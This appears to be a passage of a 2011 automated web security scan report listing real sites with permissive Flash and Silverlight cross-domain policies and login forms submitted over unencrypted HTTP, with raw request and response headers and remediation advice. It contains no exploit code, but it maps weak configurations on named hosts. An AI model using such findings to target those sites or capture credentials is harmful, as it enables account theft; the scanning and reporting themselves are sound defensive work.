HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:03:18 GMT Server: Apache-Coyote/1.1 Expires: Sun, 30 Jan 2011 02:08:18 GMT browser-expires: Sun, 30 Jan 2011 02:03:18 GMT Content-Type: text/xml;charset=UTF-8 Content-Length: 791 Vary: Accept-Encoding Connection: close Set-Cookie: SSLB=A;path=/;domain=www.reuters.com;
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.signonsandiego.com
Response
HTTP/1.1 200 OK Expires: Sun, 30 Jan 2011 03:20:09 GMT ETag: "ffb94896b4e86f190cf7f815218e6848" Cache-Control: max-age=60 Last-Modified: Sun, 30 Jan 2011 03:19:09 GMT Content-Type: text/xml Server: Apache/2.2.10 Content-Length: 355 Date: Sun, 30 Jan 2011 03:19:09 GMT X-Varnish: 1618713424 Age: 0 Via: 1.1 varnish Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.tigerdirect.com
Response
HTTP/1.0 200 OK Content-Length: 794 Content-Type: text/xml Last-Modified: Fri, 10 Sep 2010 18:55:14 GMT Accept-Ranges: bytes ETag: "38d3bcb31951cb1:4f9" Server: Microsoft-IIS/6.0 X-SV: MIA01A X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 01:24:09 GMT Connection: close
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.walmart.com
Response
HTTP/1.0 200 OK Server: Apache/2.2.15 Last-Modified: Fri, 19 Jun 2009 00:03:46 GMT ETag: "30db8-137-46ca84217bc80" Cache-Control: max-age=7200 Expires: Sun, 30 Jan 2011 04:03:54 GMT Content-Type: application/xml Date: Sun, 30 Jan 2011 02:03:54 GMT Content-Length: 311 Connection: close Set-Cookie: NSC_xxx.xbmnbsu.dpn-mc=ffffffff0907970a45525d5f4f58455e445a4a423660;path=/ Set-Cookie: SSLB=0; path=/; domain=.walmart.com
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.zacks.com
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:04:18 GMT Server: Apache/2.2.6 (Unix) mod_ssl/2.2.6 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.5 Last-Modified: Thu, 19 Nov 2009 20:44:21 GMT ETag: "2a8585e-159-478bf6c7c1340" Accept-Ranges: bytes Content-Length: 345 Cache-Control: no-store, no-cache, must-revalidate, max-age=0 Expires: Sun, 30 Jan 2011 02:04:18 GMT Pragma: no-cache Connection: close Content-Type: application/xml
The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: advertising.redacted
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 303 Content-Type: text/html Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 02:05:25 GMT Connection: close
The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: articles.moneycentral.msn.com
Response
HTTP/1.1 200 OK Connection: keep-alive Date: Sun, 30 Jan 2011 02:05:33 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA42 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Cache-Control: no-cache ETag: "66a0b61d6a90cb1:ddd" Last-Modified: Tue, 30 Nov 2010 08:39:34 GMT Content-Type: text/xml; charset=utf-8 Content-Length: 573
<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
The application publishes a Flash cross-domain policy which allows access from specific other domains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: seedmagazine.com
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:19:02 GMT Server: Apache/2.0.46 (Red Hat) Last-Modified: Tue, 10 Mar 2009 18:58:25 GMT ETag: "2e80e1-d8-55f1f640" Accept-Ranges: bytes Content-Length: 216 Connection: close Content-Type: text/xml
The application publishes a Flash cross-domain policy which allows access from specific subdomains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.livescience.com
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 03:05:40 GMT Server: Apache Last-Modified: Tue, 02 Dec 2008 19:13:20 GMT ETag: "39d1169-38f-45d151ed7d400" Accept-Ranges: bytes Content-Length: 911 Vary: Accept-Encoding Connection: close Content-Type: text/xml
<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
The application publishes a Flash cross-domain policy which allows access from specific subdomains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0 Host: www.twitter.com
The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.
Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: ad.ae.doubleclick.net
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: b.rad.redacted
Response
HTTP/1.1 200 OK Cache-Control: max-age=604800 Content-Type: text/xml Last-Modified: Fri, 21 Jan 2011 01:07:24 GMT Accept-Ranges: bytes ETag: "02ee18f7b9cb1:0" Server: Microsoft-IIS/7.5 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Sun, 30 Jan 2011 01:40:48 GMT Connection: keep-alive Content-Length: 337
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: b.voicefive.com
Response
HTTP/1.0 200 OK Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT Content-Type: application/xml Expires: Mon, 31 Jan 2011 01:40:59 GMT Date: Sun, 30 Jan 2011 01:40:59 GMT Content-Length: 320 Connection: close Cache-Control: private, no-transform, max-age=86400 Server: CS
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: ec.redcated
Response
HTTP/1.0 200 OK Content-Type: text/xml Content-Length: 312 Allow: GET Age: 134956 Date: Sun, 30 Jan 2011 02:08:12 GMT Expires: Fri, 04 Feb 2011 12:38:56 GMT Connection: close
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: jp.video.redacted
Response
HTTP/1.1 200 OK Content-Length: 312 Content-Type: text/xml Last-Modified: Sun, 22 Jun 2008 10:46:32 GMT Accept-Ranges: bytes ETag: "0f4c23b55d4c81:17d2" Server: Microsoft-IIS/6.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 02:09:08 GMT Connection: close
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: latino.aol.com
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: latino.video.redacted
Response
HTTP/1.1 200 OK Content-Length: 312 Content-Type: text/xml Last-Modified: Sun, 22 Jun 2008 10:46:32 GMT Accept-Ranges: bytes ETag: "0f4c23b55d4c81:17d2" Server: Microsoft-IIS/6.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 02:09:12 GMT Connection: close
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: netscape.aol.com
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: ninemsn.video.redacted
Response
HTTP/1.1 200 OK Content-Length: 312 Content-Type: text/xml Last-Modified: Sun, 22 Jun 2008 10:46:32 GMT Accept-Ranges: bytes ETag: "0f4c23b55d4c81:17d2" Server: Microsoft-IIS/6.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 02:17:21 GMT Connection: close
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: s0.2mdn.net
Response
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT Date: Sat, 29 Jan 2011 05:52:40 GMT Expires: Sun, 30 Jan 2011 05:52:40 GMT Vary: Accept-Encoding X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 1; mode=block Cache-Control: public, max-age=86400 Age: 73554
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: wrapper.g.redacted
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Tue, 29 Sep 2009 20:48:24 GMT Accept-Ranges: bytes ETag: "1d441304641ca1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 01:52:07 GMT Connection: close Content-Length: 337
The application publishes a Silverlight cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: www.ticketcity.com
Response
HTTP/1.1 200 OK Content-Length: 339 Content-Type: text/xml Last-Modified: Thu, 22 Jul 2010 14:19:57 GMT Accept-Ranges: bytes ETag: "a58098f6a829cb1:1713" Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2010.01.21T17:32-0600" exp "2011.01.21T12:00-0600" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2010.01.21T17:32-0600" exp "2011.01.21T12:00-0600" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2010.01.21T17:32-0600" exp "2011.01.21T12:00-0600" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2010.01.21T17:32-0600" exp "2011.01.21T12:00-0600" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2010.01.21T17:32-0600" exp "2011.01.21T12:00-0600" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2010.01.21T17:32-0600" exp "2011.01.21T12:00-0600" r (l 0 s 0 v 0 o 0)) X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 02:03:48 GMT Connection: close
The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: blstj.redacted
Response
HTTP/1.0 200 OK Cache-Control: max-age=31536000 Content-Type: text/xml Last-Modified: Mon, 22 Jun 2009 18:26:44 GMT Accept-Ranges: bytes ETag: "08a92fe66f3c91:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET S: BLUMPPSTCA03 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Sun, 30 Jan 2011 01:41:05 GMT Content-Length: 400 Connection: close
The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: dateline.msnbc.com
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Thu, 03 Dec 2009 20:08:54 GMT Accept-Ranges: bytes ETag: "55f13f705474ca1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 02:08:03 GMT Connection: close Content-Length: 533
The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: explore.live.com
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Wed, 08 Dec 2010 19:39:30 GMT Accept-Ranges: bytes ETag: "c13adea1f97cb1:0" Vary: Accept-Language,Cookie,Accept-Encoding Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 02:08:16 GMT Connection: close Content-Length: 492
The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: hardball.msnbc.com
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Thu, 03 Dec 2009 20:08:54 GMT Accept-Ranges: bytes ETag: "55f13f705474ca1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 02:08:22 GMT Connection: close Content-Length: 533
The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: msnbc.com
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Thu, 03 Dec 2009 20:08:54 GMT Accept-Ranges: bytes ETag: "55f13f705474ca1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 02:16:23 GMT Connection: close Content-Length: 533
The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: msnbcmedia.redacted
Response
HTTP/1.1 200 OK Content-Type: text/xml ETag: "8066f4feb3aecb1:243" Last-Modified: Fri, 07 Jan 2011 21:44:01 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 02:16:31 GMT Connection: close
The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: mtp.msnbc.com
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Thu, 03 Dec 2009 20:08:54 GMT Accept-Ranges: bytes ETag: "04f15705474ca1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 02:16:52 GMT Connection: close Content-Length: 533
The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: nbcsports.msnbc.com
Response
HTTP/1.0 200 OK Content-Type: text/xml Last-Modified: Thu, 03 Dec 2009 20:08:54 GMT Accept-Ranges: bytes ETag: "04f15705474ca1:25b" Server: Microsoft-IIS/6.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-Powered-By: ASP.NET X-Cnection: close Content-Length: 533 Cache-Control: public, max-age=60 Expires: Sun, 30 Jan 2011 02:18:06 GMT Date: Sun, 30 Jan 2011 02:17:06 GMT Connection: close
The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: nightly.msnbc.com
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Thu, 03 Dec 2009 20:08:54 GMT Accept-Ranges: bytes ETag: "04f15705474ca1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 02:17:18 GMT Connection: close Content-Length: 533
The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: rachel.msnbc.com
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Thu, 03 Dec 2009 20:08:54 GMT Accept-Ranges: bytes ETag: "04f15705474ca1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 02:18:13 GMT Connection: close Content-Length: 533
The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: today.msnbc.com
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Thu, 03 Dec 2009 20:08:54 GMT Accept-Ranges: bytes ETag: "55f13f705474ca1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 02:56:39 GMT Connection: close Content-Length: 533
The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: tv.msnbc.com
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Thu, 03 Dec 2009 20:08:54 GMT Accept-Ranges: bytes ETag: "55f13f705474ca1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 03:01:30 GMT Connection: close Content-Length: 533
The application publishes a Silverlight cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: www.msnbc.com
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Thu, 03 Dec 2009 20:08:54 GMT Accept-Ranges: bytes ETag: "55f13f705474ca1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 03:07:03 GMT Connection: close Content-Length: 533
The application publishes a Silverlight cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /clientaccesspolicy.xml HTTP/1.0 Host: services.money.redacted
Response
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Thu, 27 Jan 2011 23:35:24 GMT Accept-Ranges: bytes ETag: "04698de7abecb1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 01:34:35 GMT Connection: close Content-Length: 649
Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.
Issue remediation
The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://msn.chemistry.com/cp/landing/44762
The form contains the following password field:
password
Request
GET /cp/landing/44762 HTTP/1.1 Host: msn.chemistry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://msn.chemistry.com/cp/landing/57269
The form contains the following password field:
password
Request
GET /cp/landing/57269 HTTP/1.1 Host: msn.chemistry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://spacefellowship.com/login?redirect=%2F
The form contains the following password field:
password
Request
GET / HTTP/1.1 Host: spacefellowship.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:19:03 GMT Server: Apache Set-Cookie: sfs_session=cc2c07278f598760f84f6726d5e79843; expires=Sat, 19-Jan-2013 02:19:03 GMT; path=/; domain=spacefellowship.com; httponly Connection: close Content-Type: text/html; charset: utf-8 Content-Length: 92137
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
GET / HTTP/1.1 Host: www.dailygrail.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Set-Cookie: SESS2c2d3112bb07aea5c6314767c88e0a7a=7o9nkha47fuqrullf1i58nh6t2; expires=Tue, 22-Feb-2011 06:38:51 GMT; path=/; domain=.dailygrail.com Last-Modified: Sun, 30 Jan 2011 02:11:26 GMT ETag: "bf0c65ff60c7c1de71eb6cacfe0d3728" Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidate Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 30 Jan 2011 03:05:32 GMT Server: lighttpd Content-Length: 63252
GET /msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html HTTP/1.1 Host: www.foxsportsarizona.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Pragma: no-cache Content-Type: text/html Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0 Expires: Sat, 29 Jan 2011 23:53:34 GMT Date: Sat, 29 Jan 2011 23:53:34 GMT Connection: close Connection: Transfer-Encoding Content-Length: 48095
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
